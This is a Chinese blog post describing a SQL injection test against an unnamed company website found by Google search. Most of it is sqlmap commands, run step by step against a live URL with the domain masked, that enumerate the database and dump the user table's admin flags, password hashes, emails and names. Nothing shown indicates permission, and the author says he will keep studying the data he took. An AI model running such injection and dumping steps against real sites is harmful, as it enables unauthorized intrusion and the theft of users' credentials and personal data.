当前位置:网站首页>记xx公司SQL注入漏洞
记xx公司SQL注入漏洞
2022-07-29 05:18:00 【adeylinux】
就在早上,我起床的时候,我的朋友,叫我参加公益SRC.然后我被拉去挖掘公益SRC.我打开了Google搜索:inurl:科技公司.然后我打开了个网站.我预览了一下网站发现?id出于职业病.我在?id后面添加了个单引号ok呀.页面发生改变.我推测有xss或者SQL注入漏洞.
开始渗透测试.
拿出sqlmap直接一把梭.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class="
结果真有漏洞.那就接着测试,
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" --dbs
这里有两个库:bdm818993245_db,information_schema
接着一把梭.
python sqlmap.py -u "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db --tables
bdm818993245_db数据库下面有9张表:
| user |
| gplat_book |
| gplat_news |
| gplat_newsclass |
| gplat_newsclass2 |
| href |
| job |
| job_add |
| lawyer_wenda |
接下来查询user下面的管理员和密码.
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user --columns
可以空格user下面存在13个列:
+-----------+---------------+
| Column | Type |
+-----------+---------------+
| adder | varchar(8) |
| admin | int(2) |
| email | varchar(60) |
| grade | varchar(12) |
| id | int(6) |
| image | varchar(70) |
| name | varchar(60) |
| pass | varchar(60) |
| phone | varchar(14) |
| qianming | varchar(100) |
| times | datetime |
| up_time | datetime |
| xingb | varchar(2) |
+-----------+---------------+
接下来查询user下面admni和pass的数据:
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C admin,pass --dump
接下来收集一下数据库的数据:
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C email --dump
接着收集数据:
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C
查询管理员的用户名:
python sqlmap.py "http://www.xxxxxxx.com/news.php?class=" -D bdm818993245_db -T user -C name --dump
收集的差不多了.结束渗透测试.剩下的数据库和表和列我要慢慢的研究.
总结:
SQl注入尽量使用手注.因为工具跑网站.很容易蹦掉.
我的公众号.请各位大佬多多关照.
边栏推荐
- 实现table某个单元格背景色设置
- Common shortcut keys for Ad
- B - 识别浮点常量问题
- How does the MD editor of CSDN input superscripts and subscripts? The input method of formula and non formula is different
- Qtcreator+cmake compiler settings
- ·Let's introduce ourselves to the way of programming·
- Hcia-r & s self use notes (26) PPP
- Day 2
- JS deep copy - Notes
- Dynamic sorting of DOM object element blocks in applets
猜你喜欢
[C language series] - storage of deep anatomical data in memory (I) opening of summer vacation
uniapp组件之tab选项卡滑动切换
365 day challenge leetcode 1000 questions - day 035 one question per day + two point search 13
[C language series] - constants and variables that confuse students
Provincial and urban three-level linkage (simple and perfect)
关于局部变量
Question swiping Madness - leetcode's sword finger offer58 - ii Detailed explanation of left rotation string
Pyqt5: Chapter 1, Section 1: creating a user interface using QT components - Introduction
[C language series] - storage of deep anatomical data in memory (II) - floating point type
Li Kou 994: rotten orange (BFS)
随机推荐
paddle.fluild常量计算报错‘NoneType‘ object has no attribute ‘get_fetch_list‘
Set the background color of a cell in the table
uniapp组件之倒计时(如阅读协议倒计时、完成学习倒计时)
365 day challenge leetcode1000 question - day 036 binary tree pruning + subarray and sorted interval sum + delete the shortest subarray to order the remaining arrays
ClickHouse学习(八)物化视图
Three handshakes and four waves for the interview summary
Alibaba cloud and Dingjie software released the cloud digital factory solution to realize the localized deployment of cloud MES system
Longest string without duplicate characters
Day 2
H5语义化标签
Common characteristic engineering operations
基础爬虫实战案例之获取游戏商品数据
微信小程序更改属性值-setData-双向绑定-model
Hcia-r & s self use notes (27) comprehensive experiment
ClickHouse学习(二)ClickHouse单机安装
Using POI TL to insert multiple pictures and the same data of multiple rows of cells into the table cells of word template at one time, it is a functional component for automatic merging
link与@import导入外部样式的区别
ClickHouse学习(六)语法优化
Clickhouse learning (VII) table query optimization
Day 1